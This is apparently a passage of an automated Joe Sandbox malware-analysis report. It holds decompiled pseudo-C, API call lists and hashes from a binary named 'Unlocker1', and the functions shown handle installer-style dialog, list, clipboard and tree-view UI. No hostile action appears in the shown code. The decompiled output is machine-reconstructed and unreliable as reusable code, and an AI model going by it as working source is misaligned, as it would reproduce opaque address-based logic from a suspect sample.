                                                                                                                                                              							if(_t95 == 1) {
                                                                                                                                                              								_v60 = _t149;
                                                                                                                                                              								_v48 = 0x420478;
                                                                                                                                                              								_v44 = 0xfff;
                                                                                                                                                              								_a4 = _a8;
                                                                                                                                                              								do {
                                                                                                                                                              									_a4 = _a4 - 1;
                                                                                                                                                              									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                                                                                                                                              									__eflags = _a4 - _t149;
                                                                                                                                                              									_t162 = _t162 + _t98 + 2;
                                                                                                                                                              								} while (_a4 != _t149);
                                                                                                                                                              								OpenClipboard(_t149);
                                                                                                                                                              								EmptyClipboard();
                                                                                                                                                              								_t101 = GlobalAlloc(0x42, _t162);
                                                                                                                                                              								_a4 = _t101;
                                                                                                                                                              								_t163 = GlobalLock(_t101);
                                                                                                                                                              								do {
                                                                                                                                                              									_v48 = _t163;
                                                                                                                                                              									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                                                                                                                              									 *_t164 = 0xa0d;
                                                                                                                                                              									_t163 = _t164 + 2;
                                                                                                                                                              									_t149 = _t149 + 1;
                                                                                                                                                              									__eflags = _t149 - _a8;
                                                                                                                                                              								} while (_t149 < _a8);
                                                                                                                                                              								GlobalUnlock(_a4);
                                                                                                                                                              								SetClipboardData(1, _a4);
                                                                                                                                                              								CloseClipboard();
                                                                                                                                                              							}
                                                                                                                                                              							goto L37;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags =  *0x42364c - _t149; // 0x0
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							ShowWindow( *0x423e88, 8);
                                                                                                                                                              							__eflags =  *0x423f0c - _t149; // 0x0
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								_t112 =  *0x41fc48; // 0x73f11c
                                                                                                                                                              								E00404D7B( *((intOrPtr*)(_t112 + 0x34)), _t149); // executed
                                                                                                                                                              							}
                                                                                                                                                              							E00403D68(1);
                                                                                                                                                              							goto L25;
                                                                                                                                                              						}
                                                                                                                                                              						 *0x41f840 = 2;
                                                                                                                                                              						E00403D68(0x78);
                                                                                                                                                              						goto L20;
                                                                                                                                                              					} else {
                                                                                                                                                              						__eflags = _a12 - 0x403;
                                                                                                                                                              						if(_a12 != 0x403) {
                                                                                                                                                              							L20:
                                                                                                                                                              							return E00403DF6(_a8, _a12, _a16);
                                                                                                                                                              						}
                                                                                                                                                              						ShowWindow( *0x423650, _t149);
                                                                                                                                                              						ShowWindow(_t154, 8);
                                                                                                                                                              						E00403DC4(_t154);
                                                                                                                                                              						goto L17;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_v52 = _v52 | 0xffffffff;
                                                                                                                                                              				_v40 = _v40 | 0xffffffff;
                                                                                                                                                              				_v60 = 2;
                                                                                                                                                              				_v56 = 0;
                                                                                                                                                              				_v48 = 0;
                                                                                                                                                              				_v44 = 0;
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				asm("stosd");
                                                                                                                                                              				_t123 =  *0x423e90; // 0x73eeb0
                                                                                                                                                              				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                                                                                                              				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                                                                                                              				 *0x423650 = GetDlgItem(_a4, 0x403);
                                                                                                                                                              				 *0x423648 = GetDlgItem(_a4, 0x3ee);
                                                                                                                                                              				_t127 = GetDlgItem(_a4, 0x3f8);
                                                                                                                                                              				 *0x423664 = _t127;
                                                                                                                                                              				_v8 = _t127;
                                                                                                                                                              				E00403DC4( *0x423650);
                                                                                                                                                              				 *0x423654 = E0040461D(4);
                                                                                                                                                              				 *0x42366c = 0;
                                                                                                                                                              				GetClientRect(_v8,  &_v28);
                                                                                                                                                              				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                                                                                                                              				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                                                                                                                              				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                                                                                              				if(_a8 >= 0) {
                                                                                                                                                              					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                                                                                                              					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                                                                                                              				}
                                                                                                                                                              				if(_a12 >= _t149) {
                                                                                                                                                              					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                                                                                                                              				}
                                                                                                                                                              				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                              				_push(0x1b);
                                                                                                                                                              				E00403D8F(_a4);
                                                                                                                                                              				if(( *0x423e98 & 0x00000003) != 0) {
                                                                                                                                                              					ShowWindow( *0x423650, _t149); // executed
                                                                                                                                                              					if(( *0x423e98 & 0x00000002) != 0) {
                                                                                                                                                              						 *0x423650 = _t149;
                                                                                                                                                              					} else {
                                                                                                                                                              						ShowWindow(_v8, 8); // executed
                                                                                                                                                              					}
                                                                                                                                                              					E00403DC4( *0x423648);
                                                                                                                                                              				}
                                                                                                                                                              				_t158 = GetDlgItem(_a4, 0x3ec);
                                                                                                                                                              				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                                                                                                                              				if(( *0x423e98 & 0x00000004) != 0) {
                                                                                                                                                              					SendMessageA(_t158, 0x409, _t149, _a12);
                                                                                                                                                              					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                                                                                                                              				}
                                                                                                                                                              				goto L37;
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 00404F18
                                                                                                                                                              • GetDlgItem.USER32 ref: 00404F27
                                                                                                                                                              • GetClientRect.USER32 ref: 00404F64
                                                                                                                                                              • GetSystemMetrics.USER32 ref: 00404F6C
                                                                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F8D
                                                                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F9E
                                                                                                                                                              • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404FB1
                                                                                                                                                              • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FBF
                                                                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FD2
                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404FF4
                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405008
                                                                                                                                                              • GetDlgItem.USER32 ref: 00405029
                                                                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405039
                                                                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405052
                                                                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040505E
                                                                                                                                                              • GetDlgItem.USER32 ref: 00404F36
                                                                                                                                                                • Part of subcall function 00403DC4: SendMessageA.USER32(00000028,?,00000001,00403BF5), ref: 00403DD2
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040507B
                                                                                                                                                              • CreateThread.KERNELBASE ref: 00405089
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405090
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004050B4
                                                                                                                                                              • ShowWindow.USER32(000403F4,00000008), ref: 004050B9
                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405100
                                                                                                                                                              • SendMessageA.USER32(000403F4,00001004,00000000,00000000), ref: 00405132
                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00405143
                                                                                                                                                              • AppendMenuA.USER32 ref: 00405158
                                                                                                                                                              • GetWindowRect.USER32 ref: 0040516B
                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040518F
                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051CA
                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004051DA
                                                                                                                                                              • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051E0
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051E9
                                                                                                                                                              • GlobalLock.KERNEL32 ref: 004051F3
                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405207
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040521F
                                                                                                                                                              • SetClipboardData.USER32 ref: 0040522A
                                                                                                                                                              • CloseClipboard.USER32 ref: 00405230
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                              • String ID: {
                                                                                                                                                              • API String ID: 590372296-366298937
                                                                                                                                                              • Opcode ID: b13129ba0f669a28ca00f61caf8228dce9fca78b393cc99d7b0e47fba99552ae
                                                                                                                                                              • Instruction ID: d8c2bf4a41f8d47596d7e212a196e63f96e24a60825c263716f9721a4c55cacb
                                                                                                                                                              • Opcode Fuzzy Hash: b13129ba0f669a28ca00f61caf8228dce9fca78b393cc99d7b0e47fba99552ae
                                                                                                                                                              • Instruction Fuzzy Hash: 99A13A71900208BFDB219F60DD89EAE7F79FB04355F00817AFA04BA2A0C7799A51DF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E004046CA(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                              				struct HWND__* _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				void* _v24;
                                                                                                                                                              				long _v28;
                                                                                                                                                              				int _v32;
                                                                                                                                                              				signed int _v40;
                                                                                                                                                              				int _v44;
                                                                                                                                                              				signed int* _v56;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				signed int _v64;
                                                                                                                                                              				long _v68;
                                                                                                                                                              				void* _v72;
                                                                                                                                                              				intOrPtr _v76;
                                                                                                                                                              				intOrPtr _v80;
                                                                                                                                                              				void* _v84;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				struct HWND__* _t182;
                                                                                                                                                              				intOrPtr _t183;
                                                                                                                                                              				int _t189;
                                                                                                                                                              				int _t196;
                                                                                                                                                              				intOrPtr _t198;
                                                                                                                                                              				long _t202;
                                                                                                                                                              				signed int _t206;
                                                                                                                                                              				signed int _t217;
                                                                                                                                                              				void* _t220;
                                                                                                                                                              				void* _t221;
                                                                                                                                                              				int _t227;
                                                                                                                                                              				intOrPtr _t231;
                                                                                                                                                              				signed int _t232;
                                                                                                                                                              				signed int _t233;
                                                                                                                                                              				signed int _t240;
                                                                                                                                                              				signed int _t242;
                                                                                                                                                              				signed int _t245;
                                                                                                                                                              				signed int _t247;
                                                                                                                                                              				struct HBITMAP__* _t250;
                                                                                                                                                              				void* _t252;
                                                                                                                                                              				char* _t268;
                                                                                                                                                              				signed char _t269;
                                                                                                                                                              				long _t271;
                                                                                                                                                              				long _t274;
                                                                                                                                                              				int _t277;
                                                                                                                                                              				int _t280;
                                                                                                                                                              				signed int* _t281;
                                                                                                                                                              				int _t282;
                                                                                                                                                              				long _t283;
                                                                                                                                                              				signed int* _t284;
                                                                                                                                                              				int _t285;
                                                                                                                                                              				long _t286;
                                                                                                                                                              				signed int _t287;
                                                                                                                                                              				long _t288;
                                                                                                                                                              				signed int _t291;
                                                                                                                                                              				int _t294;
                                                                                                                                                              				signed int _t298;
                                                                                                                                                              				signed int _t300;
                                                                                                                                                              				signed int _t302;
                                                                                                                                                              				intOrPtr _t309;
                                                                                                                                                              				int* _t310;
                                                                                                                                                              				void* _t311;
                                                                                                                                                              				int _t315;
                                                                                                                                                              				int _t316;
                                                                                                                                                              				int _t317;
                                                                                                                                                              				signed int _t318;
                                                                                                                                                              				void* _t320;
                                                                                                                                                              				void* _t328;
                                                                                                                                                              				void* _t331;
                                                                                                                                                              
                                                                                                                                                              				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                                                                                              				_t182 = GetDlgItem(_a4, 0x408);
                                                                                                                                                              				_t280 =  *0x423ea8; // 0x73f1dc
                                                                                                                                                              				_t320 = SendMessageA;
                                                                                                                                                              				_v8 = _t182;
                                                                                                                                                              				_t183 =  *0x423e90; // 0x73eeb0
                                                                                                                                                              				_t315 = 0;
                                                                                                                                                              				_v32 = _t280;
                                                                                                                                                              				_v20 = _t183 + 0x94;
                                                                                                                                                              				if(_a8 != 0x110) {
                                                                                                                                                              					L23:
                                                                                                                                                              					__eflags = _a8 - 0x405;
                                                                                                                                                              					if(_a8 != 0x405) {
                                                                                                                                                              						_t289 = _a16;
                                                                                                                                                              					} else {
                                                                                                                                                              						_a12 = _t315;
                                                                                                                                                              						_t289 = 1;
                                                                                                                                                              						_a8 = 0x40f;
                                                                                                                                                              						_a16 = 1;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _a8 - 0x4e;
                                                                                                                                                              					if(_a8 == 0x4e) {
                                                                                                                                                              						L28:
                                                                                                                                                              						__eflags = _a8 - 0x413;
                                                                                                                                                              						_v16 = _t289;
                                                                                                                                                              						if(_a8 == 0x413) {
                                                                                                                                                              							L30:
                                                                                                                                                              							__eflags =  *0x423e99 & 0x00000002;
                                                                                                                                                              							if(( *0x423e99 & 0x00000002) != 0) {
                                                                                                                                                              								L41:
                                                                                                                                                              								__eflags = _v16 - _t315;
                                                                                                                                                              								if(_v16 != _t315) {
                                                                                                                                                              									_t232 = _v16;
                                                                                                                                                              									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                                                                                                                                                              									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                                                                                                              										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                                                                                                              									}
                                                                                                                                                              									_t233 = _v16;
                                                                                                                                                              									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                                                                                                                                                              									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                                                                                                              										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                                                                                                                                                              										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                                                                                                              											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                                                                                                                                                              											 *_t284 =  *_t284 & 0xffffffdf;
                                                                                                                                                              											__eflags =  *_t284;
                                                                                                                                                              										} else {
                                                                                                                                                              											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								goto L48;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _a8 - 0x413;
                                                                                                                                                              							if(_a8 == 0x413) {
                                                                                                                                                              								L33:
                                                                                                                                                              								__eflags = _a8 - 0x413;
                                                                                                                                                              								_t289 = 0 | _a8 != 0x00000413;
                                                                                                                                                              								_t240 = E0040464A(_v8, _a8 != 0x413);
                                                                                                                                                              								__eflags = _t240 - _t315;
                                                                                                                                                              								if(_t240 >= _t315) {
                                                                                                                                                              									_t93 = _t280 + 8; // 0x8
                                                                                                                                                              									_t310 = _t240 * 0x418 + _t93;
                                                                                                                                                              									_t289 =  *_t310;
                                                                                                                                                              									__eflags = _t289 & 0x00000010;
                                                                                                                                                              									if((_t289 & 0x00000010) == 0) {
                                                                                                                                                              										__eflags = _t289 & 0x00000040;
                                                                                                                                                              										if((_t289 & 0x00000040) == 0) {
                                                                                                                                                              											_t298 = _t289 ^ 0x00000001;
                                                                                                                                                              											__eflags = _t298;
                                                                                                                                                              										} else {
                                                                                                                                                              											_t300 = _t289 ^ 0x00000080;
                                                                                                                                                              											__eflags = _t300;
                                                                                                                                                              											if(_t300 >= 0) {
                                                                                                                                                              												_t298 = _t300 & 0xfffffffe;
                                                                                                                                                              											} else {
                                                                                                                                                              												_t298 = _t300 | 0x00000001;
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              										 *_t310 = _t298;
                                                                                                                                                              										E0040117D(_t240);
                                                                                                                                                              										_t242 =  *0x423e98; // 0xa1
                                                                                                                                                              										_t289 = 1;
                                                                                                                                                              										_a8 = 0x40f;
                                                                                                                                                              										_t245 =  !_t242 >> 0x00000008 & 1;
                                                                                                                                                              										__eflags = _t245;
                                                                                                                                                              										_a12 = 1;
                                                                                                                                                              										_a16 = _t245;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								goto L41;
                                                                                                                                                              							}
                                                                                                                                                              							_t289 = _a16;
                                                                                                                                                              							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                                                                                                                                                              							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                                                                                                                                                              								goto L41;
                                                                                                                                                              							}
                                                                                                                                                              							goto L33;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                                                                                                                                                              						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                                                                                                                                                              							goto L48;
                                                                                                                                                              						}
                                                                                                                                                              						goto L30;
                                                                                                                                                              					} else {
                                                                                                                                                              						__eflags = _a8 - 0x413;
                                                                                                                                                              						if(_a8 != 0x413) {
                                                                                                                                                              							L48:
                                                                                                                                                              							__eflags = _a8 - 0x111;
                                                                                                                                                              							if(_a8 != 0x111) {
                                                                                                                                                              								L56:
                                                                                                                                                              								__eflags = _a8 - 0x200;
                                                                                                                                                              								if(_a8 == 0x200) {
                                                                                                                                                              									SendMessageA(_v8, 0x200, _t315, _t315);
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _a8 - 0x40b;
                                                                                                                                                              								if(_a8 == 0x40b) {
                                                                                                                                                              									_t220 =  *0x420454;
                                                                                                                                                              									__eflags = _t220 - _t315;
                                                                                                                                                              									if(_t220 != _t315) {
                                                                                                                                                              										ImageList_Destroy(_t220);
                                                                                                                                                              									}
                                                                                                                                                              									_t221 =  *0x42046c;
                                                                                                                                                              									__eflags = _t221 - _t315;
                                                                                                                                                              									if(_t221 != _t315) {
                                                                                                                                                              										GlobalFree(_t221);
                                                                                                                                                              									}
                                                                                                                                                              									 *0x420454 = _t315;
                                                                                                                                                              									 *0x42046c = _t315;
                                                                                                                                                              									 *0x423ee0 = _t315;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _a8 - 0x40f;
                                                                                                                                                              								if(_a8 != 0x40f) {
                                                                                                                                                              									L86:
                                                                                                                                                              									__eflags = _a8 - 0x420;
                                                                                                                                                              									if(_a8 == 0x420) {
                                                                                                                                                              										__eflags =  *0x423e99 & 0x00000001;
                                                                                                                                                              										if(( *0x423e99 & 0x00000001) != 0) {
                                                                                                                                                              											__eflags = _a16 - 0x20;
                                                                                                                                                              											_t189 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                                                              											__eflags = _t189;
                                                                                                                                                              											_t316 = _t189;
                                                                                                                                                              											ShowWindow(_v8, _t316);
                                                                                                                                                              											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									goto L89;
                                                                                                                                                              								} else {
                                                                                                                                                              									E004011EF(_t289, _t315, _t315);
                                                                                                                                                              									__eflags = _a12 - _t315;
                                                                                                                                                              									if(_a12 != _t315) {
                                                                                                                                                              										E0040140B(8);
                                                                                                                                                              									}
                                                                                                                                                              									__eflags = _a16 - _t315;
                                                                                                                                                              									if(_a16 == _t315) {
                                                                                                                                                              										L73:
                                                                                                                                                              										E004011EF(_t289, _t315, _t315);
                                                                                                                                                              										__eflags =  *0x423eac - _t315; // 0x7
                                                                                                                                                              										_v32 =  *0x42046c;
                                                                                                                                                              										_t196 =  *0x423ea8; // 0x73f1dc
                                                                                                                                                              										_v60 = 0xf030;
                                                                                                                                                              										_v16 = _t315;
                                                                                                                                                              										if(__eflags <= 0) {
                                                                                                                                                              											L84:
                                                                                                                                                              											InvalidateRect(_v8, _t315, 1);
                                                                                                                                                              											_t198 =  *0x42365c; // 0x7664ab
                                                                                                                                                              											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                                                                                                                                                              											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                                                                                                                                              												E00404568(0x3ff, 0xfffffffb, E0040461D(5)); // executed
                                                                                                                                                              											}
                                                                                                                                                              											goto L86;
                                                                                                                                                              										} else {
                                                                                                                                                              											_t142 = _t196 + 8; // 0x73f1e4
                                                                                                                                                              											_t281 = _t142;
                                                                                                                                                              											do {
                                                                                                                                                              												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                                                                                                              												__eflags = _t202 - _t315;
                                                                                                                                                              												if(_t202 != _t315) {
                                                                                                                                                              													_t291 =  *_t281;
                                                                                                                                                              													_v68 = _t202;
                                                                                                                                                              													__eflags = _t291 & 0x00000001;
                                                                                                                                                              													_v72 = 8;
                                                                                                                                                              													if((_t291 & 0x00000001) != 0) {
                                                                                                                                                              														_t151 =  &(_t281[4]); // 0x73f1f4
                                                                                                                                                              														_v72 = 9;
                                                                                                                                                              														_v56 = _t151;
                                                                                                                                                              														_t154 =  &(_t281[0]);
                                                                                                                                                              														 *_t154 = _t281[0] & 0x000000fe;
                                                                                                                                                              														__eflags =  *_t154;
                                                                                                                                                              													}
                                                                                                                                                              													__eflags = _t291 & 0x00000040;
                                                                                                                                                              													if((_t291 & 0x00000040) == 0) {
                                                                                                                                                              														_t206 = (_t291 & 0x00000001) + 1;
                                                                                                                                                              														__eflags = _t291 & 0x00000010;
                                                                                                                                                              														if((_t291 & 0x00000010) != 0) {
                                                                                                                                                              															_t206 = _t206 + 3;
                                                                                                                                                              															__eflags = _t206;
                                                                                                                                                              														}
                                                                                                                                                              													} else {
                                                                                                                                                              														_t206 = 3;
                                                                                                                                                              													}
                                                                                                                                                              													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                                                                                                                                                              													__eflags = _t294;
                                                                                                                                                              													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                                                                                                              													SendMessageA(_v8, 0x1102, _t294, _v68);
                                                                                                                                                              													SendMessageA(_v8, 0x110d, _t315,  &_v72); // executed
                                                                                                                                                              												}
                                                                                                                                                              												_v16 = _v16 + 1;
                                                                                                                                                              												_t281 =  &(_t281[0x106]);
                                                                                                                                                              												__eflags = _v16 -  *0x423eac; // 0x7
                                                                                                                                                              											} while (__eflags < 0);
                                                                                                                                                              											goto L84;
                                                                                                                                                              										}
                                                                                                                                                              									} else {
                                                                                                                                                              										_t282 = E004012E2( *0x42046c);
                                                                                                                                                              										E00401299(_t282);
                                                                                                                                                              										_t217 = 0;
                                                                                                                                                              										_t289 = 0;
                                                                                                                                                              										__eflags = _t282 - _t315;
                                                                                                                                                              										if(_t282 <= _t315) {
                                                                                                                                                              											L72:
                                                                                                                                                              											SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                                                                                                              											_a16 = _t282;
                                                                                                                                                              											_a8 = 0x420;
                                                                                                                                                              											goto L73;
                                                                                                                                                              										} else {
                                                                                                                                                              											goto L69;
                                                                                                                                                              										}
                                                                                                                                                              										do {
                                                                                                                                                              											L69:
                                                                                                                                                              											_t309 = _v20;
                                                                                                                                                              											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                                                                                                                                                              											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                                                                                                                                                              												_t289 = _t289 + 1;
                                                                                                                                                              												__eflags = _t289;
                                                                                                                                                              											}
                                                                                                                                                              											_t217 = _t217 + 1;
                                                                                                                                                              											__eflags = _t217 - _t282;
                                                                                                                                                              										} while (_t217 < _t282);
                                                                                                                                                              										goto L72;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _a12 - 0x3f9;
                                                                                                                                                              							if(_a12 != 0x3f9) {
                                                                                                                                                              								goto L89;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _a12 >> 0x10 - 1;
                                                                                                                                                              							if(_a12 >> 0x10 != 1) {
                                                                                                                                                              								goto L89;
                                                                                                                                                              							}
                                                                                                                                                              							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                                                                                                              							__eflags = _t227 - 0xffffffff;
                                                                                                                                                              							if(_t227 == 0xffffffff) {
                                                                                                                                                              								goto L89;
                                                                                                                                                              							}
                                                                                                                                                              							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                                                                                                              							__eflags = _t283 - 0xffffffff;
                                                                                                                                                              							if(_t283 == 0xffffffff) {
                                                                                                                                                              								L54:
                                                                                                                                                              								_t283 = 0x20;
                                                                                                                                                              								L55:
                                                                                                                                                              								E00401299(_t283);
                                                                                                                                                              								SendMessageA(_a4, 0x420, _t315, _t283);
                                                                                                                                                              								_a12 = 1;
                                                                                                                                                              								_a16 = _t315;
                                                                                                                                                              								_a8 = 0x40f;
                                                                                                                                                              								goto L56;
                                                                                                                                                              							}
                                                                                                                                                              							_t231 = _v20;
                                                                                                                                                              							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                                                                                                                                                              							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                                                                                                                                                              								goto L55;
                                                                                                                                                              							}
                                                                                                                                                              							goto L54;
                                                                                                                                                              						}
                                                                                                                                                              						goto L28;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					 *0x423ee0 = _a4;
                                                                                                                                                              					_t247 =  *0x423eac; // 0x7
                                                                                                                                                              					_t285 = 2;
                                                                                                                                                              					_v28 = 0;
                                                                                                                                                              					_v16 = _t285;
                                                                                                                                                              					 *0x42046c = GlobalAlloc(0x40, _t247 << 2);
                                                                                                                                                              					_t250 = LoadBitmapA( *0x423e80, 0x6e);
                                                                                                                                                              					 *0x420460 =  *0x420460 | 0xffffffff;
                                                                                                                                                              					_v24 = _t250;
                                                                                                                                                              					 *0x420468 = SetWindowLongA(_v8, 0xfffffffc, E00404CCB);
                                                                                                                                                              					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                                                                              					 *0x420454 = _t252;
                                                                                                                                                              					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                                                                                                              					SendMessageA(_v8, 0x1109, _t285,  *0x420454);
                                                                                                                                                              					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                                                                              						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                                                                                                              					}
                                                                                                                                                              					DeleteObject(_v24);
                                                                                                                                                              					_t286 = 0;
                                                                                                                                                              					do {
                                                                                                                                                              						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                                                                                                              						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                                                                                                                              							if(_t286 != 0x20) {
                                                                                                                                                              								_v16 = _t315;
                                                                                                                                                              							}
                                                                                                                                                              							_t277 = SendMessageA(_v12, 0x143, _t315, E004059FF(_t286, _t315, _t320, _t315, _t258)); // executed
                                                                                                                                                              							SendMessageA(_v12, 0x151, _t277, _t286);
                                                                                                                                                              						}
                                                                                                                                                              						_t286 = _t286 + 1;
                                                                                                                                                              					} while (_t286 < 0x21);
                                                                                                                                                              					_t317 = _a16;
                                                                                                                                                              					_t287 = _v16;
                                                                                                                                                              					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                                                                                                              					_push(0x15);
                                                                                                                                                              					E00403D8F(_a4);
                                                                                                                                                              					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                                                                                                              					_push(0x16);
                                                                                                                                                              					E00403D8F(_a4);
                                                                                                                                                              					_t318 = 0;
                                                                                                                                                              					_t288 = 0;
                                                                                                                                                              					_t328 =  *0x423eac - _t318; // 0x7
                                                                                                                                                              					if(_t328 <= 0) {
                                                                                                                                                              						L19:
                                                                                                                                                              						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                                                              						goto L20;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t311 = _v32 + 8;
                                                                                                                                                              						_v24 = _t311;
                                                                                                                                                              						do {
                                                                                                                                                              							_t268 = _t311 + 0x10;
                                                                                                                                                              							if( *_t268 != 0) {
